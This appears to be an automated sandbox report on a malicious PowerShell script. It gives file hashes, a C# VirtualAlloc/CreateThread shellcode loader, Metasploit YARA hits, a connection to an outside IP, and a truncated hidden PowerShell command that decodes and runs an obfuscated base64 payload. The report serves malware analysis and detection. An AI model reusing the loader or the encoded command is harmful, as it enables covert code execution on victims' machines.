                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Sat Oct 26 13:16:49 2024, 1st section name ".debug$S"
                            Category:dropped
                            Size (bytes):1332
                            Entropy (8bit):3.985898587774303
                            Encrypted:false
                            SSDEEP:24:HlFzW91+fS0DfHKwKEsmNwI+ycuZhNHakSZPNnqS2d:dSyBKhmm1ulHa3bqSG
                            MD5:4B32980265E6B35304A78FE457BE47CE
                            SHA1:1E79A12F39936AAC54D27CE6034F2BCCD55246DC
                            SHA-256:6D196DB2AF8EDB8139170F247B531EE26EE7D0CF746690C8AFBC47E9F535BEF1
                            SHA-512:6D0E61E259284BBCA2F874CD9A196746283EEE0A35C876973C2A627D0141ED06A743758283A5C3402260C56605758B4C0ECB4B41CD48734992058232536A536A
                            Malicious:false
                            Reputation:low
                            Preview:L......g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP...............[a&...n.;.{9..............4.......C:\Users\user\AppData\Local\Temp\RES45B2.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.n.t.j.s.p.e.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f4eysaxf.3ft.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fknazxxb.my5.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4u1nkdm.gc2.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zeryh4z0.0ra.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.09219313905282
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry+l0ak7YnqqdlZPN5Dlq5J:+RI+ycuZhNHakSZPNnqX
                            MD5:5B6126C7D1E16EFC3B157B39F8191EBE
                            SHA1:759F8C334170256CC1371E6140D18ECAC08C1B69
                            SHA-256:A035CEFCD6238B54FE3E61D257EDB5AD3D228E079F1EDCFDA5693756F6082A8D
                            SHA-512:EE767673A9521CBD4CBE5BEC5BE681051694B5C44A6F29415C92DE15321E6DAB22270FADB19058B0A87F20DAE8A4867DE55A409FC12CD50DF0A3EA588FBB2203
                            Malicious:false
                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.n.t.j.s.p.e.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.n.t.j.s.p.e.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                            C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.0.cs

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text
                            Category:dropped
                            Size (bytes):465
                            Entropy (8bit):4.903694224086983
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuU0q/FMGiVFSRNuhmQMT7ViVFSRBHALR53/JFqmzqsYEz/KjPzgFp:V/DTLDfuUh+mQMT73tc9JFqmmsmPzgKy
                            MD5:029A251DB8736D1C039890283DDAFD0D
                            SHA1:B2D1944EF240BAA681565C6327011B30E0F980FD
                            SHA-256:D1B97CAC79D2B968A2D80DF52AB40E480540F81040A825C5ABA1192C72DB2B0C
                            SHA-512:71347E5EB5E4ED3DAB872072D84F8EEB575C27632FFB53826F905FD19DB9EC082E49D55D7901B98E2AC6AE3DE61189D6352BAE790E5F1BD9E6DB28BC22F31B8F
                            Malicious:false
                            Preview:.using System;.using System.Runtime.InteropServices;..namespace Win32Functions.{. public class Win32. {. [DllImport("kernel32.dll")].public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);.[DllImport("kernel32.dll")].public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);.. }..}.

                            C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                            Category:dropped
                            Size (bytes):369
                            Entropy (8bit):5.190232868484049
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fW6vVUzxs7+AEszIwkn23fW6vP:p37Lvkmb6KRf+cqWZEif+cP
                            MD5:198432FB60C8B3F734E76CC2AD2AE653
                            SHA1:978FC68348DE827D82B7815657A87C0CE20A7176
                            SHA-256:F8491D1A9CAB925063366C00BE4E338FE25E8C470054CB4CC476B26C7190ACD5
                            SHA-512:BFBEAA8B77C26C1B9444BE20960A4C94B6C5A0DF90954F2FA6F594706FC16331E0B1B4D93E529DDC36594DC056F64634B042AF846B2FD32AAA8F2F07BB89D072
                            Malicious:true
                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.0.cs"

                            C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll

                            Download File
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.755515321075929
                            Encrypted:false
                            SSDEEP:24:etGSdM+AW6wP8Lpi/qQ/Twt/h1c53XIJKN7tkZfqmsYWI+ycuZhNHakSZPNnq:68RNFi3/Kc1NcJqmsz1ulHa3bq
                            MD5:B1DDE75FD011B8FF5C0FE6B150C51056
                            SHA1:CD1D9E4A62B42CE38567EB0E6BA31854670D9F76
                            SHA-256:1DB2D32019AC21C6380C174C78F74F49A7E79518513DD73E0FEF3624696C3928
                            SHA-512:6768CFE059FE78A1912DC0A69B28ED42B16EA80D3B805F6D0541C22BDAF3C556A714681F7D3C091C67B2D9746F9D7621E25B9D3583771BC96645AE1A40B5E999
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!................^$... ...@....... ....................................@..................................$..S....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@$......H.......X ................................................................(....*BSJB............v4.0.30319......l...L...#~..........#Strings....D.......#US.L.......#GUID...\...T...#Blob...........G.........%3............................................................<.5.........$.....j.K.................................... C............ P.....P ......].........c.....m.....t.............................................]. ...]...!.].%...].......*.....3.}.....C.......P.........

                            C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.out

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (448), with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):869
                            Entropy (8bit):5.304089730398237
                            Encrypted:false
                            SSDEEP:24:KJBId3ka6KRfnEifqKax5DqBVKVrdFAMBJTH:Ckka6CnEuqK2DcVKdBJj
                            MD5:D2EEEFD7F6D2C2978F422A8BFF1D1095
                            SHA1:BDA331586995D458DA8458392136C9E07270F056
                            SHA-256:B7E267D8B672B629D95D8B4C2A91B58B3E332C49E5EE7459FD902D1A04D3DAE6
                            SHA-512:3C5FD0AAE61916FC7404AF53DBCAB6A8D650F0FF42B0F0E02F747D31A24778414F47237098476FD8C4A13804E255E3483D8438BED6091BD3AC6757867D64B82C
                            Malicious:false
                            Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36U39KFQJEE78T6R9Y9Q.temp

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6221
                            Entropy (8bit):3.7381802099245567
                            Encrypted:false
                            SSDEEP:96:EeolH33CxHkMkvhkvCCtklLFu29HllLFu29HA:Ee8HyEIILwMLwp
                            MD5:91F71606B3DBA364B565EB2CDF9290E0
                            SHA1:DA6C3277F7C3ABC61C2AAC32FB949D63F13AE8D7
                            SHA-256:3063F01790296EEF50EACDD14A625B606238AA43C2D5E66F9C947400CFF0A8C8
                            SHA-512:769C6014363CFC6E5136FB520B58724D7ED43E4AFB75B3D82024D5E43964C11C6704F667AF6E17B561D0FEE7DF10EC0CA9385B92E10ECD998EF9DEA003D84DA9
                            Malicious:false
                            Preview:...................................FL..................F.".. ...-/.v......)..'..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....@...'.."10..'......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^ZY<]...........................%..A.p.p.D.a.t.a...B.V.1.....ZYA]..Roaming.@......CW.^ZYA]..........................n...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................`.p.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^ZYE]....Q...........

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6221
                            Entropy (8bit):3.7381802099245567
                            Encrypted:false
                            SSDEEP:96:EeolH33CxHkMkvhkvCCtklLFu29HllLFu29HA:Ee8HyEIILwMLwp
                            MD5:91F71606B3DBA364B565EB2CDF9290E0
                            SHA1:DA6C3277F7C3ABC61C2AAC32FB949D63F13AE8D7
                            SHA-256:3063F01790296EEF50EACDD14A625B606238AA43C2D5E66F9C947400CFF0A8C8
                            SHA-512:769C6014363CFC6E5136FB520B58724D7ED43E4AFB75B3D82024D5E43964C11C6704F667AF6E17B561D0FEE7DF10EC0CA9385B92E10ECD998EF9DEA003D84DA9
                            Malicious:false
                            Preview:...................................FL..................F.".. ...-/.v......)..'..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....@...'.."10..'......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^ZY<]...........................%..A.p.p.D.a.t.a...B.V.1.....ZYA]..Roaming.@......CW.^ZYA]..........................n...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................`.p.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^ZYE]....Q...........

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF594778.TMP (copy)

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6221
                            Entropy (8bit):3.7381802099245567
                            Encrypted:false
                            SSDEEP:96:EeolH33CxHkMkvhkvCCtklLFu29HllLFu29HA:Ee8HyEIILwMLwp
                            MD5:91F71606B3DBA364B565EB2CDF9290E0
                            SHA1:DA6C3277F7C3ABC61C2AAC32FB949D63F13AE8D7
                            SHA-256:3063F01790296EEF50EACDD14A625B606238AA43C2D5E66F9C947400CFF0A8C8
                            SHA-512:769C6014363CFC6E5136FB520B58724D7ED43E4AFB75B3D82024D5E43964C11C6704F667AF6E17B561D0FEE7DF10EC0CA9385B92E10ECD998EF9DEA003D84DA9
                            Malicious:false
                            Preview:...................................FL..................F.".. ...-/.v......)..'..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....@...'.."10..'......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^ZY<]...........................%..A.p.p.D.a.t.a...B.V.1.....ZYA]..Roaming.@......CW.^ZYA]..........................n...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................`.p.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^ZYE]....Q...........

                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NPJMGXIC699F92ASQKVD.temp

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):6221
                            Entropy (8bit):3.7378393859809265
                            Encrypted:false
                            SSDEEP:96:6Gklfn3CVMkMkvhkvCCtklLFu29HllLFu29HA:6GIf2NIILwMLwp
                            MD5:44F1CCEBFD276EC4A81B2904C6F6EA70
                            SHA1:D4AFEAC998F16A59BA14F70F6AA55B314473B0C3
                            SHA-256:779A897727BB3291C1ACC5C87D288FC60D5311A552A8479C33802DAE53D45023
                            SHA-512:A2492DF78AF50C3D40029AB4EACD9D25D829D1BE06C24D92A5A8D7CE0872CBB91412621F75A14E65E40DC9B2CEC97A68A8D29B16590B89D6052E50DA83258DD0
                            Malicious:false
                            Preview:...................................FL..................F.".. ...-/.v......)..'..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....@...'..zQx..'......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^ZYD]...........................%..A.p.p.D.a.t.a...B.V.1.....ZYA]..Roaming.@......CW.^ZYA]..........................n...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^ZYE]..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^ZYE]..........................`.p.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^ZYE]....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^ZYE]....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^ZYE]..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^ZYE]....Q...........

                            Static File Info

                            General

                            File type:ASCII text, with very long lines (26529)
                            Entropy (8bit):3.888338101727056
                            TrID:
                              File name:x6bjOrKFQn.ps1
                              File size:27'264 bytes
                              MD5:b2cc4f57ccfdb79e1f65bdcc203afecb
                              SHA1:56be6d9cfc79e265765f4fa4a13a34f422c28c94
                              SHA256:bfa856e4339bfadacdcb6730a256353e0b09dd0d20f0571bed84a4226b65b740
                              SHA512:8425b747784a617cba33c20186c6a06929fc1f494e59ee0207c567b6655e29558807dcc9b41ee5f688ed89cdea422dd668fe598ca53b7cd12caa9bda97d567f6
                              SSDEEP:768:yqnukUqSa1bdn5QR0MiYGTGT8vqEUqUbQJ:5
                              TLSH:9DC2180F3506EC2E530FAED2BEEC7CAAFA1018EA4FC8C04DF5606FD762961596948715
                              File Content Preview:$g6LyR1Nyz2yDZ4t = @".[DllImport("kernel32.dll")].public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);.[DllImport("kernel32.dll")].public static extern IntPtr CreateThread(IntPtr lpThreadAttribute

                              File Icon

                              Icon Hash:3270d6baae77db44

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 26, 2024 13:42:15.152915001 CEST49730443192.168.2.4206.41.208.89
                              Oct 26, 2024 13:42:15.152962923 CEST44349730206.41.208.89192.168.2.4
                              Oct 26, 2024 13:42:15.153024912 CEST49730443192.168.2.4206.41.208.89
                              Oct 26, 2024 13:42:15.313457966 CEST49730443192.168.2.4206.41.208.89
                              Oct 26, 2024 13:42:15.313487053 CEST44349730206.41.208.89192.168.2.4
                              Oct 26, 2024 13:42:15.313585997 CEST44349730206.41.208.89192.168.2.4

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Oct 26, 2024 13:42:30.808258057 CEST53569241.1.1.1192.168.2.4
                              Oct 26, 2024 13:42:33.433787107 CEST53652211.1.1.1192.168.2.4

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:07:42:09
                              Start date:26/10/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1"
                              Imagebase:0x7ff788560000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.1748293931.000001FDE6620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:1
                              Start time:07:42:09
                              Start date:26/10/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              General

                              Target ID:2
                              Start time:07:42:12
                              Start date:26/10/2024
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline"
                              Imagebase:0x7ff77b460000
                              File size:2'759'232 bytes
                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:3
                              Start time:07:42:12
                              Start date:26/10/2024
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES45B2.tmp" "c:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP"
                              Imagebase:0x7ff789620000
                              File size:52'744 bytes
                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:4
                              Start time:07:42:13
                              Start date:26/10/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlI